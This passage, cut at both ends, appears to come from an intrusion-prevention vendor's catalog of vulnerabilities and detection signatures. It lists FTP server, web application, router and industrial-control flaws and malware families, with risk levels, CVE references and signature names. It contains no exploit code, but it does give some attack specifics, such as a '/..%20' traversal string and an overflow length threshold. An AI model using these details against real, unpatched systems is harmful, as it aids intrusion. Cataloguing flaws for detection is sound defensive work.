FTP_CS-WU-FTPD-Palmetto-BOF-W00f
FTP_CS-WU-FTPD-Palmetto-BOF-Duke
FTP_CS-WU-FTPD-Palmetto-BOF-Bulba
FTP_CS-WU-FTPD-Palmetto-BOF-Wu30
FTP_CS-WU-FTPD-Palmetto-BOF-Admwuftpd

References:

CVE-1999-0368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0368

FTP-ProFTPD-Input-Validation-DoS

About this vulnerability:

ProFTPD Input Validation Denial of Service

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

ProFTPD

Type:

Malfunction

Description:

By using crafted STAT commands it is possible to cause ProFTPD from responding to requets - this might result in a denial of service condition.

Situation:

FTP_CS-ProFTPD-DoS-Stat

References:

BID-6341
http://www.securityfocus.com/bid/6341

FTP-ProFTPD-Snprintf

About this vulnerability:	ProFTPD snprintf call vulnerability
Risk:	High
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux
Software:	ProFTPD
Type:	Format String
Description:	ProFTPD (<= pre6) passes user commands to snprinft() enabling a root shell to an attacker.
Situation:	FTP_CS-ProFTPD-Snprintf

FTP-ProFTPD-User-SQL-Injection

About this vulnerability:

ProFTPD SQL injection vulnerability allows unauthorized login

Risk:

High

First detected in:

sgpkg-ips-206-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux

Software:

ProFTPD

Type:

SQL Injection

Description:

A vulnerability exists in ProFTPD that could be exploited by remote attackers to conduct SQL injection attacks on the server. This flaw is due to improper validation of a user-supplied username string before being used in an SQL query. A remote unauthenticated attacker can trigger this vulnerability by sending a malicious username to the target ProFTPD server and gain the privileges of a legitimate user. A successful attack can allow the attacker to masquerade as an authenticated user and, depending upon their privileges, gain unauthorized access and cause denial of service.

Situation:

FTP_CS-ProFTPD-User-SQL-Injection

References:

CVE-2009-0542
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0542

BID-33722
http://www.securityfocus.com/bid/33722

FTP-Selfreferencing-Path

About this vulnerability:	Selfreferencing path
Risk:	Low
First detected in:	sgpkg-ips-100-1314
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic FTP server
Type:	Directory Traversal
Description:	A selfreferencing "./." path detected. This might be related to buffer overflow type of attacks for example.
Situation:	FTP_CS-Very-Long-Self-Referencing-Path

FTP-Serv-U-Directory-Traversal

About this vulnerability:

Serv-U FTP server directory traversal vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Serv-U FTP Server

Type:

Directory Traversal

Description:

Versions 2.4 and 2.5 of the Serv-U FTP server allow directory traversal via a /..%20 in the directory name. Users have the same access permissions as in their home directory to any files that reside on the same partition as ftproot. This vulnerability can be exploited by authenticated remote users to read or write to any files on the host.

Situation:

FTP_CS-Serv-U-Directory-Traversal

References:

CVE-2001-0054
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0054

BID-2052
http://www.securityfocus.com/bid/2052

OSVDB-464
http://www.osvdb.org/464

FTP-Serv-U-FTP-Server-Buffer-Overflow

About this vulnerability:

Serv-U FTP Server Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-7-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Serv-U FTP Server

Type:

Buffer Overflow

Description:

Buffer overflows in Serv-U FTP Server allow remote attackers to execute arbitrary code via long command arguments.

Situation:

FTP_CS-Serv-U-Cwd-BOF

References:

CVE-1999-0219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0219

BID-269
http://www.securityfocus.com/bid/269

FTP-Serv-U-MDTM-Command-Buffer-Overflow

About this vulnerability:

Serv-U FTP Server MTDM Command Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Serv-U FTP Server

Type:

Buffer Overflow

Description:

Buffer overflow in Serv-U FTP before 5.0.0.4 allows remote authenticated users to execute arbitrary code via a long timezone argument to the MDTM command.

Situation:

FTP_CS-Serv-U-MDTM-Timezone-Buffer-Overflow
FTP_CS-Serv-U-MDTM-Command-Buffer-Overflow-1

References:

CVE-2004-0330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0330

BID-9751
http://www.securityfocus.com/bid/9751

OSVDB-4073
http://www.osvdb.org/4073

FTP-Serv-U-Site-Chmod-Command-Buffer-Overflow

About this vulnerability:

Serv-U FTP Server SITE CHMOD Command Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-11-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Serv-U FTP Server

Type:

Buffer Overflow

Description:

The Serv-u FTP Server is prone to a buffer overflow while handling the "site chmod" command with a filename containg excessive data. This condition may be exploited by attackers to execute arbitrary commands on the server.

Situation:

FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-1
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-2
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-3
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-4
FTP_CS-Serv-U-Site-Chmod-Command-Buffer-Overflow-5

References:

BID-9675
http://www.securityfocus.com/bid/9675

OSVDB-3713
http://www.osvdb.org/3713

FTP-Server-Shell-Command-Execution

About this vulnerability:	Attempt to execute shell commands
Risk:	Moderate
First detected in:	sgpkg-ips-441-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Malfunction
Description:	This fingerprint detects attempts to execute shell commands on an FTP server
Situation:	FTP_CS-Shell-Command-Execution

FTP-SlimFTPd-List-Buffer-Overflow

About this vulnerability:

Buffer Overflow in SlimFTPd

Risk:

High

First detected in:

sgpkg-ips-169-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WhitSoft SlimFTPd

Type:

Buffer Overflow

Description:

A remotely exploitable buffer overflow exists in Cisco IOS FTP server.

Situation:

FTP_CS-Oversized-List-Argument-Buffer-Overflow

References:

BID-14339
http://www.securityfocus.com/bid/14339

OSVDB-18172
http://www.osvdb.org/18172

FTP-Solaris-Globbing-Vulnerability

About this vulnerability:

Solaris shadow password file disclosure fia ftpd

Risk:

Low

First detected in:

sgpkg-ips-8-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Solaris

Software:

Solaris ftpd

Type:

Buffer Overflow

Description:

Due to a known buffer overflow condition in glob(), an attacker is able to cause the FTP server to crash, causing parts of the shadow password file to be dumped in a world-readable core file in the root directory. This way the attacker may be able to obtain passwords and therefore gain elevated privileges.

Situation:

FTP_CS-Cwd-Home-Solaris-Information-Disclosure

References:

CVE-2001-0421
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0421

BID-2601
http://www.securityfocus.com/bid/2601

FTP-Usage

About this vulnerability:	FTP usage detection
Risk:	Low
First detected in:	sgpkg-ips-126-2032
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Generic FTP server
Type:	Remote Control
Description:	This vulnerability is referenced by fingerprints that detect FTP protocol usage. FTP transfers all data between the client and the server in cleartext making it possible for third parties to listen for sensitive data such as passwords.
Situation:	FTP_CS-Password

FTP-Wftpd-Long-Argument-Buffer-Overflow

About this vulnerability:

Buffer overflow in Wftpd

Risk:

High

First detected in:

sgpkg-ips-214-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WFTPD

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in Wftpd ftp server. When an oversized argument is given with the STAT, NLST or LIST command, a buffer overflow occurs. If successfully exploited, the attacker can execute arbitrary commands on the server.

Situation:

FTP_CS-Oversized-Stat-Argument
FTP_CS-Oversized-List-Argument
FTP_CS-Oversized-Nlst-Argument

References:

CVE-2004-0340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0340

BID-9767
http://www.securityfocus.com/bid/9767

FTP-Wftpd-Mkd-Cwd

About this vulnerability:

Wftpd Mkd Cwd

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

WFTPD

Type:

Buffer Overflow

Description:

WFTPD v2.34,v2.40 Server and earlier are vulnerable to remotely exploitable MKD CWD arguments buffer overflow.

Situation:

FTP_CS-Wftpd-Mkd-Cwd

References:

CVE-1999-0950
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0950

BID-747
http://www.securityfocus.com/bid/747

FTP-Win-G6-Dele-Rnfr-Path-Disclosure

About this vulnerability:	Path disclosure vulnerability in G6 ftpd software
Risk:	Low
First detected in:	sgpkg-ips-1-1102
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	G6 FTP server
Type:	Malfunction
Description:	Succesfull exploitation of this vulnerability reveals the attacker the G6 FTP full installation path. This information may help the attacker and give some leverage to initiate more severe attacks in order to compromise the server.
Situation:	FTP_CS-Windows-G6-Path-Disclosure

FTP-Windows-Retr-Get-Drive-Letter

About this vulnerability:

Windows RETR get drive letter

Risk:

Moderate

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Generic FTP server

Type:

Malfunction

Description:

Some FTP servers running on windows platform may suffer of a denial of service condition if drive letters are specified in the request. This happens especially with the drive A:\.

Situation:

FTP_CS-Windows-Any-Ftpd-Retr-Get-DoS

References:

CVE-2001-0695
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0695

FTP-Ws-FTP-Server-Site-iFtpSvc-Remote-Command-Execution

About this vulnerability:

WS_FTP server Siten iFtpSvc Remote Command Execution

Risk:

High

First detected in:

sgpkg-ips-249-3038

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WS_FTP Server

Type:

Malfunction

Description:

Ipswitch WS_FTP FTP server allows remote authenticated users to execute arbitrary commands as SYSTEM by exploiting a vulnerability in the SITE command.

Situation:

FTP_CS-Ws-FTP-Server-iFtpSvc-System-Compromise

References:

CVE-2004-1885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1885

BID-9953
http://www.securityfocus.com/bid/9953

FTP-Ws-FTP-Server-XCRC-XMD5-XSHA1-Command-Buffer-Overflow

About this vulnerability:

WS_FTP server buffer overflow with commands XCRC,XMD5 and XSHA1

Risk:

High

First detected in:

sgpkg-ips-80-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WS_FTP Server

Type:

Buffer Overflow

Description:

WS_FTP FTP server implements nonstandard commands XCRC, XMD5 and XSHA1 for file integrity checking. The first argument to these commands is <filename>, which is copied by the software to a fixed size buffer without any boundary checking. A filename parameter of over 672 characters will overflow the buffer and affect the program's execution. This vulnerability allows users to execute arbitrary code on the FTP server by sending a malicious query.

Situation:

FTP_CS-Ws-FTP-Server-XCRC-XMD5-XSHA1-Command-Buffer-Overflow

References:

CVE-2006-4847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4847

BID-20076
http://www.securityfocus.com/bid/20076

OSVDB-28939
http://www.osvdb.org/28939

FTP-WU-FTPD-Site-Exec

About this vulnerability:

Site exec vulnerability in WU-FTPD

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

WU-FTPD

Type:

Insecure Configuration

Description:

WU-FTPD FTP server allows root access via site exec command.

Situation:

FTP_CS-WU-FTPD-Site-Exec-Sh

References:

CVE-1999-0080
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0080

BID-2241
http://www.securityfocus.com/bid/2241

OSVDB-77
http://www.osvdb.org/77

FTP-WU-FTPD-Site-Newer-Command-Execution

About this vulnerability:

WU-FTPD resource starvation vulnerability

Risk:

High

First detected in:

sgpkg-ips-6-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; SCO

Software:

WU-FTPD

Type:

Resource Starvation

Description:

The "site newer" command in WU-FTPD consumes excessive amounts of memory, which can be used in a denial-of-service attack. Also, if the attacker can create files on the system, they may be able to exploit this vulnerability to execute arbitrary code on the server with the FTP daemon privileges.

Situation:

FTP_CS-WU-FTPD-Site-Newer-Command-Execution

References:

CVE-1999-0880
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0880

BID-737
http://www.securityfocus.com/bid/737

FTP-WU-FTPD-Use-Compress

About this vulnerability:

WU-FTPD Use compress vulnerability

Risk:

High

First detected in:

sgpkg-ips-1-1102

Last changed:

sgpkg-ips-1296-5242

Platform:

Unix

Software:

WU-FTPD

Type:

Malfunction

Description:

WU-FTPD contains remote vulnerability which can be exploited trough --use-compress-program with invalid arguments leading to a system compromise.

Situation:

FTP_CS-WU-FTPD-Use-Compress

References:

CVE-1999-0997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0997

BID-2240
http://www.securityfocus.com/bid/2240

FTPShell-Client-Enterprise-Edition-Stack-Buffer-Overflow

About this vulnerability:

A vulnerability in FTPShell Client Enterprise Edition

Risk:

High

First detected in:

sgpkg-ips-1111-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

FTPShell

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability in FTPShell Client 6.70 Enterprise Edition which allows remote attackers to perform remote code execution through the FTP 220 response code.

Situation:

FTP_SS-FTPShell-Client-Enterprise-Edition-Stack-Buffer-Overflow

References:

CVE-2018-7573
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7573

Fuel-CMS-SQL-Injection-CVE-2020-17463

About this vulnerability:

An attempt to exploit a vulnerability in Fuel CMS detected

Risk:

High

First detected in:

sgpkg-ips-1419-5242

Last changed:

sgpkg-ips-1419-5242

Platform:

Generic

Software:

Fuel CMS

Type:

Input Validation

Description:

An SQL injection vulnerability exists in the Fuel CMS version 1.4.7.

Situation:

HTTP_CRL-Fuel-CMS-SQL-Injection-CVE-2020-17463

References:

CVE-2020-17463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17463

Fuji-Electric-V-Server-Heap-Buffer-Overflow

About this vulnerability:

A vulnerability in Fuji Electric V-Server

Risk:

Moderate

First detected in:

sgpkg-ips-1228-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Fuji Electric V-Server

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability has been reported in Fuji Electric V-Server. The vulnerability is due to improper validation of user-supplied data in VPR project files. A remote, unauthenticated attacker could exploit this vulnerability by enticing a target user into opening a crafted VPR file. Successful exploitation allows the attacker to execute arbitrary code under the security context of the application process.

Situation:

File-Binary_Fuji-Electric-V-Server-Heap-Buffer-Overflow

References:

CVE-2019-18240
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-18240

Full-Width-And-Half-Width-Unicode-Encoding-Evasion

About this vulnerability:	Full-Width-And-Half-Width-Unicode-Encoding-Evasion
Risk:	Moderate
First detected in:	sgpkg-ips-632-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Any Operating System
Software:	<os>
Type:	Input Validation
Description:	There is a vulnerability in several HTTP content scanning systems that allows unicode encoded traffic go past unscanned.
Situation:	HTTP_CRL-Possible-Full-Width-And-Half-Width-Unicode-Encoding-Evasion

FunWebProducts

About this vulnerability:	FunWebProducts browser plugin
Risk:	Low
First detected in:	sgpkg-ips-39-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	FunWebProducts
Type:	Misconfiguration
Description:	FunWebProducts is a plugin for Internet Explorer. It displays advertisements and may be considered unwanted software by some organizations.
Situation:	HTTP_CSH-FunWebProducts-Activity

Furtims-Parent-Nullptr-Host-Field

About this vulnerability:	Hostname linked with Furtim's Parent malware activity
Risk:	High
First detected in:	sgpkg-ips-779-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	<os>
Type:	Post Compromise Behaviour
Description:	A suspicious "nullptr" hostname field in HTTP traffic. This hostname has been linked with an advanced malware known as Furtim's Parent. Seeing this traffic might indicate a system compromise.
Situation:	HTTP_CSH-Furtims-Parent-Nullptr-Host-Field

FusionPBX-Command-Exec.php-Command-Execution

About this vulnerability:	A vulnerability in FusionPBX
Risk:	High
First detected in:	sgpkg-ips-1206-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Linux; Unix
Software:	FusionPBX
Type:	Input Validation
Description:	There exists a vulnerability in the FusionPBX, version 4.4.1, which allows remote attackers to execute arbitrary code through exec.php, due to unsufficient user input validation.
Situation:	HTTP_CRL-FusionPBX-Command-Exec.php-Command-Execution

FusionPBX-Fax-Server-Fax_Send-Command-Injection

About this vulnerability:

A vulnerability in FusionPBX

Risk:

Moderate

First detected in:

sgpkg-ips-1407-5242

Last changed:

sgpkg-ips-1407-5242

Platform:

Generic

Software:

FusionPBX

Type:

Input Validation

Description:

Insufficient input validation on the fax_extension parameter causes a command injection vulnerability in FusionPBX. A successful attack allows arbitrary commands to be executed on the target system.

Situation:

HTTP_CS-FusionPBX-Fax-Server-Fax_Send-Command-Injection

References:

CVE-2021-43405
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43405

FusionPBX-Operator-Panel-Exec.php-Command-Execution

About this vulnerability:

A vulnerability in FusionPBX

Risk:

High

First detected in:

sgpkg-ips-1206-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Linux; Unix

Software:

FusionPBX

Type:

Input Validation

Description:

There exists a vulnerability in the FusionPBX, versions 4.4.3 and before, which allows remote attackers to execute arbitrary code by sending a 'system' command to the FreeSWITCH event socket interface, due to unsufficient user input validation.

Situation:

HTTP_CS_FusionPBX-Operator-Panel-Exec.php-Command-Execution

References:

CVE-2019-11409
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11409

FusionPBX-Service-Edit-Command-Injection

About this vulnerability:

A vulnerability in FusionPBX

Risk:

High

First detected in:

sgpkg-ips-1352-5242

Last changed:

sgpkg-ips-1352-5242

Platform:

Linux

Software:

FusionPBX

Type:

Input Validation

Description:

There exists a vulnerability in FusionPBX, versions 4.4.8, which allows remote attackers to execute arbitrary code via the service_cmd_start parameter to service_edit.php due to insufficient user input validation.

Situation:

HTTP_CRL-JFusionPBX-Service-Edit-Command-Injection

References:

CVE-2019-15029
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15029

FXC-AE1021PE-Router-Command-Injection-CVE-2023-49897

About this vulnerability:

A vulnerability in FXC AE1021PE router firmware

Risk:

High

First detected in:

sgpkg-ips-1729-5242

Last changed:

sgpkg-ips-1729-5242

Platform:

Generic

Software:

FXC AE1021PE

Type:

Input Validation

Description:

An OS command injection vulnerability has been reported in the firmware of the FXC AE1021PE and AE1021 wireless routers. An authenticated attacker can use this vulnerability to execute arbitrary commands.

Situation:

HTTP_CRL-FXC-AE1021PE-Router-Command-Injection-CVE-2023-49897

References:

CVE-2023-49897
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-49897

G-LED-Assistant-Remove3dlut-Directory-Traversal

About this vulnerability:	A vulnerability in LG LED Assistant
Risk:	Moderate
First detected in:	sgpkg-ips-1698-5242
Last changed:	sgpkg-ips-1698-5242
Platform:	Generic
Software:	LG LED Assistant
Type:	Directory Traversal
Description:	Improper input validation of user-sent data in the remove3DLUT function causes a directory traversal vulnerability in LG LED Assistant. A successful exploitation allows an attacker to delete files or cause a denial of service condition on the target system.
Situation:	HTTP_CRL-LG-LED-Assistant-Remove3dlut-Directory-Traversal

Gafgyt-Linux-Infection-Traffic

About this vulnerability:	Gafgyt Linux infection traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1355-5242
Last changed:	sgpkg-ips-1355-5242
Platform:	Linux
Software:	<os>
Type:	Backdoor
Description:	Gafgyt Linux infection traffic was detected.
Situation:	Generic_CS-Gafgyt-Linux-Infection-Traffic

Galaxy-Store-Improper-Access-Control-CVE-2023-21433

About this vulnerability:

A vulnerability in Galaxy Store

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Galaxy Store

Type:

Malfunction

Description:

An improper access control vulnerability in Galaxy App Store versions prior to 4.5.49.8 allows any installed application to install additional applications from the Galaxy Store arbitrarily and without the knowledge of the user.

Situation:

Generic_CS-Galaxy-Store-Improper-Access-Control-CVE-2023-21433

References:

CVE-2023-21433
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21433

Galaxy-Store-Webview-Filter-Bypass-CVE-2023-21434

About this vulnerability:

A vulnerability in Galaxy Store

Risk:

Moderate

First detected in:

sgpkg-ips-1865-5242

Last changed:

sgpkg-ips-1865-5242

Platform:

Generic

Software:

Galaxy Store

Type:

Malfunction

Description:

Insufficient input validation in Galaxy App Store versions prior to 4.5.49.8 allows bypassing the webview domain filtering. An attacker could exploit this by enticing the target user into clicking a crafted hyperlink. A successful exploit can cause arbitrary Javascript execution via an attacker-controlled web page.

Situation:

File-Text_Galaxy-Store-Webview-Filter-Bypass-CVE-2023-21434

References:

CVE-2023-21434
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21434

Galil-RIO-DoS-CVE-2013-0699

About this vulnerability:

A vulnerability in Galil RIO

Risk:

Moderate

First detected in:

sgpkg-ips-610-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Galil RIO

Type:

Malfunction

Description:

There is a denial of service vulnerability in Galil RIO

Situation:

Generic_CS-Galil-RIO-DoS-CVE-2013-0699

References:

CVE-2013-0699
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0699

Gallery-Cross-Site-Scripting

About this vulnerability:

A vulnerability in Gallery

Risk:

High

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Gallery

Type:

Cross-site Scripting

Description:

A Cross Site scripting security breach in open source image management system Gallery

Situation:

HTTP_CSU-Gallery-Cross-Site-Scripting

References:

CVE-2003-0614
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0614

BID-8828
http://www.securityfocus.com/bid/8828

Gambio-Online-Webshop-Unauthenticated-PHP-Deserialization-Vulnerability

About this vulnerability:

An attempt to exploit a vulnerability in Gambio Online Webshop detected

Risk:

High

First detected in:

sgpkg-ips-1720-5242

Last changed:

sgpkg-ips-1720-5242

Platform:

Generic

Software:

Gambio Online Webshop

Type:

Input Validation

Description:

A vulnerability in Gambio Online Webshop, versions 4.9.2.0 and before, which allows remote attackers to execute arbitrary code through the search parameter in a POST request to Parcelshopfinder/AddAddressBookEntry.

Situation:

HTTP_CRL-Gambio-Online-Webshop-Unauthenticated-PHP-Deserialization-Vulnerability

References:

CVE-2024-23759
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23759

GAMSoft-TelSrv-Username-Buffer-Overflow

About this vulnerability:

A GAMSoft TelSrv Username Buffer Overflow vulnerability

Risk:

Moderate

First detected in:

sgpkg-ips-775-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GAMSoft TelSrv

Type:

Malfunction

Description:

A vulnerability in GAMSoft TelSrv, versions 1.5 and before, which allows remote attackers to cause a denial of service condition via a long username.

Situation:

Telnet_CS-GAMSoft-TelSrv-Username-Buffer-Overflow

References:

CVE-2000-0665
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0665

Ganglia-Meta-Daemon-Process-Path-Stack-Buffer-Overflow

About this vulnerability:

A buffer overflow vulnerability in Ganglia meta daemon process

Risk:

High

First detected in:

sgpkg-ips-202-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ganglia

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the Ganglia meta daemon (gmetad). The vulnerability is a boundary error while processing a long path element. A remote attacker can exploit this vulnerability by sending a malicious request to the server. Successful exploitation may lead to arbitrary code execution in the security context of the logged in user.

Situation:

Generic_CS-Ganglia-Meta-Daemon-Process-Path-Stack-Buffer-Overflow

References:

CVE-2009-0241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0241

BID-33299
http://www.securityfocus.com/bid/33299

Gator

About this vulnerability:	Gator software
Risk:	Low
First detected in:	sgpkg-ips-33-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Gator
Type:	Misconfiguration
Description:	Gator is considered unwanted software by some organizations. This product serves popup advertisments to the user and sends some information to Claria.
Situation:	HTTP_CSH-Gator-User-Agent HTTP_CSH-Gain-Publishing-Installer

Gauss-Bot

About this vulnerability:	Gauss Bot
Risk:	High
First detected in:	sgpkg-ips-618-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Gauss is a password stealing Trojan which attempts to steal system information and various credentials.
Situation:	HTTP_CSH-Gauss-Bot-Traffic-Detected

GD-Library-Libgd-gd2getheader-Integer-Overflow

About this vulnerability:

A vulnerability in GD Library libgd

Risk:

Moderate

First detected in:

sgpkg-ips-790-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GD Graphics Library

Type:

Integer Overflow

Description:

An integer overflow causes a heap buffer overflow vulnerability in libgd, which is included in PHP. A successful exploit allows an attacker to run arbitrary code on the target system.

Situation:

File-Binary_GD-Library-Libgd-gd2getheader-Integer-Overflow

References:

CVE-2016-5766
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5766

GD-Library-Libgd-Heap-Buffer-Overflow-CVE-2016-3074

About this vulnerability:

A vulnerability in GD Library libgd

Risk:

Moderate

First detected in:

sgpkg-ips-766-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

GD Graphics Library

Type:

Buffer Overflow

Description:

A buffer overflow resulting from a signedness error in libgd can be exploited by sending a crafted GD2 file to the target. A successful exploitation can lead to code execution with the privileges of the exploited process.

Situation:

File-Binary_GD-Library-Libgd-GD_gd2.c-Heap-Buffer-Overflow

References:

CVE-2016-3074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3074

GE-D20-Commands

About this vulnerability:	Configuration commands related with GE D20 operation
Risk:	Moderate
First detected in:	sgpkg-ips-616-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	GE D20
Type:	Misconfiguration
Description:	User commands related with GE D20 substation controller. Detecting these commands may indicate unauthorized access to configuration tools.
Situation:	Telnet_CS-GE-D20-Remote-Diagnostic-Self-Test Telnet_CS-GE-D20-Feature-Request Telnet_CS-GE-D20-Reboot Telnet_GE-D20-Clear-Audit-Log-Attempt Telnet_GE-D20-Display-Access-Change-Attempt Telnet_GE-D20-View-Device-Status Telnet_GE-D20-Invalid-Command Telnet_GE-D20-Logoff Telnet_GE-D20-Update-Date-Time Telnet_GE-D20-Successful-Login Telnet_GE-D20-Failed-Login TFTP_GE-D20-Config-File-Change-Attempt

GE-Fanuc-Proficy-HMI/SCADA-CIMPLICITY-Webserver-Information-Disclosure

About this vulnerability:

A vulnerability in Ge Fanuc Proficy CIMPLICITY HMI server

Risk:

High

First detected in:

sgpkg-ips-608-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ge Fanuc Proficy CIMPLICITY HMI server

Type:

Malfunction

Description:

There is an information disclosure vulnerability in Ge Fanuc Proficy CIMPLICITY HMI server which allows attackers to download webview.cfg which contains scada's users credentials.

Situation:

HTTP_CRL-GE-Fanuc-Proficy-HMI/SCADA-CIMPLICITY-Webserver-Information-Disclosure

References:

CVE-2014-0750
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0750

BID-65124
http://www.securityfocus.com/bid/65124

GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure

About this vulnerability:	A vulnerability in GE Fanuc Real Time Portal
Risk:	High
First detected in:	sgpkg-ips-608-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	Ge Fanuc Real Time Portal
Type:	Malfunction
Description:	There is an information disclosure vulnerability in Ge Fanuc Real Time Portal which allows an attacker to disclose sensitive information.
Situation:	HTTP_CS_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure HTTP_CSU_GE-Fanuc-Real-Time-Portal-Sensitive-Information-Disclosure

GE-Mds-Pulsenet-Filedownloadservlet-Directory-Traversal

About this vulnerability:

A vulnerability in General Electric MDS PulseNET

Risk:

Moderate

First detected in:

sgpkg-ips-694-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

General Electric MDS PulseNET

Type:

Directory Traversal

Description:

The GE MDS PulseNET products have insufficient validation in the FileDownloadServlet. It allows unauthenticated file operations via a directory traversal.

Situation:

HTTP_CSU-GE-Mds-Pulsenet-Filedownloadservlet-Directory-Traversal

References:

CVE-2015-6459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6459

GE-Mds-Pulsenet-Hidden-Support-Account-Remote-Code-Execution

About this vulnerability:

A vulnerability in General Electric MDS PulseNET

Risk:

High

First detected in:

sgpkg-ips-691-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

General Electric MDS PulseNET

Type:

Malfunction

Description:

A default credential vulnerability has been reported in GE MDS PulseNET. The vulnerability is due to static credentials of a hidden support account permitting administrator access to the system. A remote attacker can exploit these default credentials to access the system. Once authenticated, the attacker can perform various administrative tasks. This may lead to the execution of arbitrary code under the permissions of System.

Situation:

HTTP_CRL-GE-Mds-Pulsenet-Hidden-Support-Account-Remote-Code-Execution

References:

CVE-2015-6456
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6456

GE-Mds-Pulsenet-Remote-Invocation-Insecure-Deserialization

About this vulnerability:

A vulnerability in General Electric MDS PulseNET

Risk:

Moderate

